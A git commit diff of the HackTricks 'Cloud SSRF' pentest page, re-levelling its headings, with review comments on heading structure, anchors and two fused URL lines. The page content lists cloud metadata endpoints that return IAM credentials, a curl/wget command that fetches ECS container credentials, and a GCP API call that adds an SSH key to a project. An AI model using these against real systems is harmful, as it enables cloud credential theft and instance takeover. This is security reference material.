GitBook: [#3174] No subject

CPol 2022-05-02 18:53:13 +00:00 committed by gitbook-bot
parent 453d24f044
commit ff681fc8fc
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF

@ -1,4 +1,4 @@
# Cloud SSRF
<details>
@ -16,12 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
## AWS
# AWS
### Abusing SSRF in AWS EC2 environment
## Abusing SSRF in AWS EC2 environment
### 169.254.169.254 - Metadata Address
#### 169.254.169.254 - Metadata Address
**Metadata** of the basic virtual machines from AWS (called EC2) can be retrieved from the VM accessing the url: `http://169.254.169.254` ([information about the metadata here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)).
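Review bot: heading levels are inconsistent after this change. `# AWS` puts AWS at the same level as the page title `# Cloud SSRF`, while the other providers in this commit end up at `##` (`## GCP`, `## Digital Ocean`, `## Azure`), and the outline jumps from `## Abusing SSRF in AWS EC2 environment` straight to `#### 169.254.169.254 - Metadata Address`, skipping `###`. Suggest `## AWS`, `### Abusing SSRF in AWS EC2 environment` and `#### 169.254.169.254 - Metadata Address`, so the AWS section nests the same way as the rest of the page.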
@ -74,7 +73,7 @@ Another possible interesting place where you can find credentials is in[ http://
[**PACU**](https://github.com/RhinoSecurityLabs/pacu) can be used with the discovered credentials to find out your privileges and try to escalate privileges
## SSRF in AWS ECS (Container Service) credentials
### SSRF in AWS ECS (Container Service) credentials
**ECS**, is a logical group of EC2 instances on which you can run an application without having to scale your own cluster management infrastructure because ECS manages that for you. If you manage to compromise service running in **ECS**, the **metadata endpoints change**.
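Review bot: at `###` the ECS heading now sits underneath `## Abusing SSRF in AWS EC2 environment`, although the paragraph itself says the metadata endpoints change for ECS and the command in this section uses `169.254.170.2` rather than `169.254.169.254`. Put it at the same level as the EC2 heading so readers do not take the ECS credential endpoint for part of the EC2 metadata service. While touching this section, the context line "compromise service running" should read "compromise a service running".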
@ -86,7 +85,7 @@ You could be able to read it exploiting an **Path Traversal** to _file:///proc/s
curl "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null || wget "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -O -
```
## SSRF URL for AWS Elastic Beanstalk <a href="#6f97" id="6f97"></a>
### SSRF URL for AWS Elastic Beanstalk <a href="#6f97" id="6f97"></a>
We retrieve the `accountId` and `region` from the API.
@ -105,9 +104,11 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean
Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
# GCP <a href="#6440" id="6440"></a>
## GCP <a href="#6440" id="6440"></a>
## SSRF URL for Google Cloud <a href="#6440" id="6440"></a>
You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata).
### SSRF URL for Google Cloud <a href="#6440" id="6440"></a>
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" and you can access the metadata endpoint in with the following URLs:
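Review bot: `## GCP` and `### SSRF URL for Google Cloud` both carry `<a href="#6440" id="6440"></a>`, so the page has two elements with the same `id` and a `#6440` link can only reach the first; give the subsection its own anchor or drop the anchor from it. The added docs link points at the App Engine standard Java page (`/appengine/docs/standard/java/accessing-instance-metadata`) while the URLs in this section are `computeMetadata` paths on `metadata.google.internal`, so state which product the link covers. The context line also has a stray word in "metadata endpoint in with the following URLs".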
@ -193,7 +194,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
```
## Add an SSH key <a href="#3e24" id="3e24"></a>
### Add an SSH key <a href="#3e24" id="3e24"></a>
Extract the token
@ -222,7 +223,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo
--data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}'
```
# Digital Ocean <a href="#9f1f" id="9f1f"></a>
## Digital Ocean <a href="#9f1f" id="9f1f"></a>
Documentation available at [`https://developers.digitalocean.com/documentation/metadata/`](https://developers.digitalocean.com/documentation/metadata/)
@ -238,11 +239,11 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re
curl http://169.254.169.254/metadata/v1.json | jq
```
# Packetcloud <a href="#2af0" id="2af0"></a>
## Packetcloud <a href="#2af0" id="2af0"></a>
Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata)
# Azure <a href="#cea8" id="cea8"></a>
## Azure <a href="#cea8" id="cea8"></a>
Limited, maybe more exists? [`https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`](https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/)
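Review bot: the section line in this hunk's header shows the last Digital Ocean URL fused with the text that follows it, `.../interfaces/public/0/ipv6/addressAll in one re`, so a line break is missing after the `ipv6/address` URL in the block above the `curl http://169.254.169.254/metadata/v1.json | jq` line. This commit only re-levels the headings and leaves that in place; split the URL and the following text onto separate lines here or in a follow-up, otherwise the listed endpoint is not usable as written.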
@ -255,7 +256,7 @@ http://169.254.169.254/metadata/instance?api-version=2017-04-02
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
```
# OpenStack/RackSpace <a href="#2ffc" id="2ffc"></a>
## OpenStack/RackSpace <a href="#2ffc" id="2ffc"></a>
(header required? unknown)
@ -263,7 +264,7 @@ http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/pu
http://169.254.169.254/openstack
```
# HP Helion <a href="#a8e0" id="a8e0"></a>
## HP Helion <a href="#a8e0" id="a8e0"></a>
(header required? unknown)
@ -271,7 +272,7 @@ http://169.254.169.254/openstack
http://169.254.169.254/2009-04-04/meta-data/
```
# Oracle Cloud <a href="#a723" id="a723"></a>
## Oracle Cloud <a href="#a723" id="a723"></a>
```
http://192.0.0.192/latest/
@ -280,7 +281,7 @@ http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/
```
# Alibaba <a href="#51bd" id="51bd"></a>
## Alibaba <a href="#51bd" id="51bd"></a>
```
http://100.100.100.200/latest/meta-data/
@ -288,7 +289,7 @@ http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
```
# Kubernetes ETCD <a href="#c80a" id="c80a"></a>
## Kubernetes ETCD <a href="#c80a" id="c80a"></a>
Can contain API keys and internal ip and ports
@ -297,7 +298,7 @@ curl -L http://127.0.0.1:2379/version
curl http://127.0.0.1:2379/v2/keys/?recursive=true
```
# Docker <a href="#ac0b" id="ac0b"></a>
## Docker <a href="#ac0b" id="ac0b"></a>
```
http://127.0.0.1:2375/v1.24/containers/jsonSimple example
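Review bot: the context line `http://127.0.0.1:2375/v1.24/containers/jsonSimple example` inside the Docker code block has the URL run together with the words "Simple example". Put the URL on its own line ending in `/containers/json` and move "Simple example" to its own line ahead of the `curl --unix-socket /var/run/docker.sock` commands, ideally outside the fence, so nobody copies `jsonSimple` as part of the path.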
@ -306,13 +307,12 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
```
# Rancher <a href="#8cb7" id="8cb7"></a>
## Rancher <a href="#8cb7" id="8cb7"></a>
```
curl http://rancher-metadata/<version>/<path>
```
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -328,5 +328,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>